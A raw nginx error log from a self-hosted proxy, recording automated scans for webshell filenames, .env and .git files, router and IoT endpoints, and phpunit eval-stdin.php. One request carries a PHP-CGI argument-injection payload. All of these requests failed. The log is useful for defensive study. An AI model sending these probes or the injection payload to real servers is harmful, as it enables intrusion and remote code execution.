04:46:06 [error] 225#225: *4844 open() "/var/www/html/editor.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /editor.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:07 [error] 225#225: *4844 open() "/var/www/html/wp-content/index.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-content/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:07 [error] 225#225: *4844 open() "/var/www/html/wp-includes/SimplePie/wp-login.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/SimplePie/wp-login.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:07 [error] 225#225: *4844 open() "/var/www/html/cong.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /cong.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:07 [error] 225#225: *4844 open() "/var/www/html/wp-includes/assets/index.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/assets/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:07 [error] 225#225: *4844 open() "/var/www/html/inputs.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /inputs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:08 [error] 225#225: *4844 open() "/var/www/html/admin/index.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /admin/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:08 [error] 225#225: *4844 open() "/var/www/html/wp-admin/js/wp-conflg.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/wp-conflg.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:08 [error] 225#225: *4844 open() "/var/www/html/files.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /files.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:08 [error] 225#225: *4844 open() "/var/www/html/zwso.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /zwso.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:09 [error] 225#225: *4844 open() "/var/www/html/wp-admin/css/colors/blue/index.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/blue/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:09 [error] 225#225: *4844 open() "/var/www/html/backup.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /backup.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:09 [error] 225#225: *4844 open() "/var/www/html/wp-includes/block-patterns/index.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/block-patterns/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:09 [error] 225#225: *4844 open() "/var/www/html/06.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /06.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:10 [error] 225#225: *4844 open() "/var/www/html/size.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /size.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:10 [error] 225#225: *4844 open() "/var/www/html/vx.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /vx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:10 [error] 225#225: *4844 open() "/var/www/html/dev1s.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /dev1s.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:10 [error] 225#225: *4844 open() "/var/www/html/zr.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /zr.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:10 [error] 225#225: *4844 open() "/var/www/html/styles.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /styles.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:11 [error] 225#225: *4844 open() "/var/www/html/file.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /file.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:11 [error] 225#225: *4844 open() "/var/www/html/revision.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /revision.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:11 [error] 225#225: *4844 open() "/var/www/html/panel.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /panel.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:11 [error] 225#225: *4844 open() "/var/www/html/wen.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wen.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:12 [error] 225#225: *4844 open() "/var/www/html/ioxi-o.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:12 [error] 225#225: *4844 open() "/var/www/html/gtc.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /gtc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:12 [error] 225#225: *4844 open() "/var/www/html/mini.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /mini.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:13 [error] 225#225: *4844 open() "/var/www/html/siteheads.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /siteheads.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:13 [error] 225#225: *4844 open() "/var/www/html/okxh.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /okxh.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:13 [error] 225#225: *4844 open() "/var/www/html/content.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /content.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:13 [error] 225#225: *4844 open() "/var/www/html/wp-good.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-good.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:14 [error] 225#225: *4844 open() "/var/www/html/abcd.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /abcd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:14 [error] 225#225: *4844 open() "/var/www/html/log.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /log.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:14 [error] 225#225: *4844 open() "/var/www/html/info.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /info.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:14 [error] 225#225: *4844 open() "/var/www/html/ar/mgsl.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /ar/mgsl.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:15 [error] 225#225: *4844 open() "/var/www/html/404.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /404.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:15 [error] 225#225: *4844 open() "/var/www/html/assets/as.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /assets/as.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:15 [error] 225#225: *4844 open() "/var/www/html/12.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /12.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:15 [error] 225#225: *4844 open() "/var/www/html/yr.PHP" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /yr.PHP HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:16 [error] 225#225: *4844 open() "/var/www/html/dex.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /dex.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:19 [error] 225#225: *4844 open() "/var/www/html/yas.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /yas.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:19 [error] 225#225: *4844 open() "/var/www/html/up.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /up.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:19 [error] 225#225: *4844 open() "/var/www/html/ova.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /ova.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:19 [error] 225#225: *4844 open() "/var/www/html/buy.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /buy.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:20 [error] 225#225: *4844 open() "/var/www/html/wp-content/lock360.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-content/lock360.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:20 [error] 225#225: *4844 open() "/var/www/html/classwithtostring.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /classwithtostring.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:20 [error] 225#225: *4844 open() "/var/www/html/acxx.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /acxx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:20 [error] 225#225: *4844 open() "/var/www/html/includes/phpinfo.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /includes/phpinfo.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:21 [error] 225#225: *4844 open() "/var/www/html/mk.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /mk.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:21 [error] 225#225: *4844 open() "/var/www/html/zoo.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /zoo.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:21 [error] 225#225: *4844 open() "/var/www/html/33.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /33.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:21 [error] 225#225: *4844 open() "/var/www/html/js/sxx.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /js/sxx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:22 [error] 225#225: *4844 open() "/var/www/html/mode.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /mode.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:22 [error] 225#225: *4844 open() "/var/www/html/docs.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /docs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:22 [error] 225#225: *4844 open() "/var/www/html/abc.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /abc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:22 [error] 225#225: *4844 open() "/var/www/html/ioxi001.PhP7" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /ioxi001.PhP7 HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:23 [error] 225#225: *4844 open() "/var/www/html/wp-tot.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-tot.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:23 [error] 225#225: *4844 open() "/var/www/html/mah/xBrain.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /mah/xBrain.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:23 [error] 225#225: *4844 open() "/var/www/html/ioxi.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /ioxi.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:23 [error] 225#225: *4844 open() "/var/www/html/ans.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /ans.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:24 [error] 225#225: *4844 open() "/var/www/html/ok.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /ok.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:24 [error] 225#225: *4844 open() "/var/www/html/asasx.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /asasx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:24 [error] 225#225: *4844 open() "/var/www/html/fileupload.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /fileupload.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:24 [error] 225#225: *4844 open() "/var/www/html/fm.php/sts.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /fm.php/sts.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:24 [error] 225#225: *4844 open() "/var/www/html/ran.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /ran.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:25 [error] 225#225: *4844 open() "/var/www/html/set.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /set.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:25 [error] 225#225: *4844 open() "/var/www/html/bs2.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /bs2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:25 [error] 225#225: *4844 open() "/var/www/html/pegi.PhP8" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /pegi.PhP8 HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:26 [error] 225#225: *4844 open() "/var/www/html/gifclass.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /gifclass.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:26 [error] 225#225: *4844 open() "/var/www/html/wp-admin/maint/about.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:26 [error] 225#225: *4844 open() "/var/www/html/manager.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /manager.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:27 [error] 225#225: *4844 open() "/var/www/html/xx.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /xx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:27 [error] 225#225: *4844 open() "/var/www/html/about.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:27 [error] 225#225: *4844 open() "/var/www/html/zfile.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /zfile.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:28 [error] 225#225: *4844 open() "/var/www/html/ccou.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /ccou.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:28 [error] 225#225: *4844 open() "/var/www/html/as.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /as.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:28 [error] 225#225: *4844 open() "/var/www/html/autoload_classmap.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /autoload_classmap.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:28 [error] 225#225: *4844 open() "/var/www/html/.well-known/admin.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /.well-known/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:29 [error] 225#225: *4844 open() "/var/www/html/ar.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /ar.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:29 [error] 225#225: *4844 open() "/var/www/html/css/index.php" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /css/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 04:46:29 [error] 225#225: *4844 open() "/var/www/html/retu11.PhP7" failed (2: No such file or directory), client: 20.89.194.119, server: localhost-nginx-proxy-manager, request: "GET /retu11.PhP7 HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 05:00:06 [error] 225#225: *4848 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 05:09:44 [error] 225#225: *4857 open() "/var/www/html/mifs/c/windows/api/v2/device/registration" failed (2: No such file or directory), client: 104.131.175.221, server: localhost-nginx-proxy-manager, request: "GET /mifs/c/windows/api/v2/device/registration HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 05:09:44 [error] 225#225: *4858 open() "/var/www/html/mifs/rs/api/v2/device/registration" failed (2: No such file or directory), client: 104.131.175.221, server: localhost-nginx-proxy-manager, request: "GET /mifs/rs/api/v2/device/registration HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 05:20:25 [error] 225#225: *4865 open() "/var/www/html/.env" failed (2: No such file or directory), client: 141.98.11.171, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 06:04:04 [error] 222#222: *4900 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 07:42:55 [error] 225#225: *6427 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 08:14:30 [error] 224#224: *7952 open() "/var/www/html/security.txt" failed (2: No such file or directory), client: 206.168.34.120, server: localhost-nginx-proxy-manager, request: "GET /security.txt HTTP/1.1", host: "91.82.215.191" +2026/01/30 08:48:58 [error] 230#230: *7965 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 184.105.247.194, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "91.82.215.191" +2026/01/30 08:51:14 [error] 230#230: *9453 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 184.105.247.194, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "91.82.215.191" +2026/01/30 09:00:03 [error] 230#230: *9456 open() "/var/www/html/manager/html" failed (2: No such file or directory), client: 20.83.173.252, server: localhost-nginx-proxy-manager, request: "GET /manager/html HTTP/1.1", host: "91.82.215.191" +2026/01/30 09:07:15 [error] 231#231: *9460 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 09:16:39 [error] 231#231: *9483 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 09:58:30 [error] 232#232: *9514 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 10:22:52 [error] 232#232: *9522 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 10:39:56 [error] 232#232: *9530 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 11:13:38 [error] 229#229: *9546 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 11:41:50 [error] 229#229: *9552 open() "/var/www/html/GponForm/diag_Form" failed (2: No such file or directory), client: 103.208.104.226, server: localhost-nginx-proxy-manager, request: "POST /GponForm/diag_Form?images/ HTTP/1.1", host: "127.0.0.1:80" +2026/01/30 12:10:54 [error] 230#230: *9561 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 12:11:56 [error] 230#230: *9562 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 12:21:12 [error] 230#230: *9585 "/var/www/html/bins/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bins/ HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 13:05:31 [error] 230#230: *9607 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 13:10:05 [error] 230#230: *9609 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 13:13:58 [error] 229#229: *11105 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 66.132.153.129, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91.82.215.191" +2026/01/30 13:42:41 [error] 229#229: *11117 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 13:55:39 [error] 229#229: *11555 open() "/var/www/html/.git/HEAD" failed (2: No such file or directory), client: 185.241.208.170, server: localhost-nginx-proxy-manager, request: "GET /.git/HEAD HTTP/1.1", host: "91.82.215.191" +2026/01/30 14:00:44 [error] 230#230: *11624 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:02:25 [error] 230#230: *11666 open() "/var/www/html/.git/HEAD" failed (2: No such file or directory), client: 185.241.208.170, server: localhost-nginx-proxy-manager, request: "GET /.git/HEAD HTTP/1.1", host: "91.82.215.191" +2026/01/30 14:21:05 [error] 230#230: *11686 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:06 [error] 230#230: *11686 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:06 [error] 230#230: *11686 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:07 [error] 230#230: *11686 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:08 [error] 230#230: *11686 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:08 [error] 230#230: *11686 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:09 [error] 230#230: *11686 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:09 [error] 230#230: *11686 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:10 [error] 230#230: *11686 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:10 [error] 230#230: *11686 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:11 [error] 230#230: *11686 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:12 [error] 230#230: *11686 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" 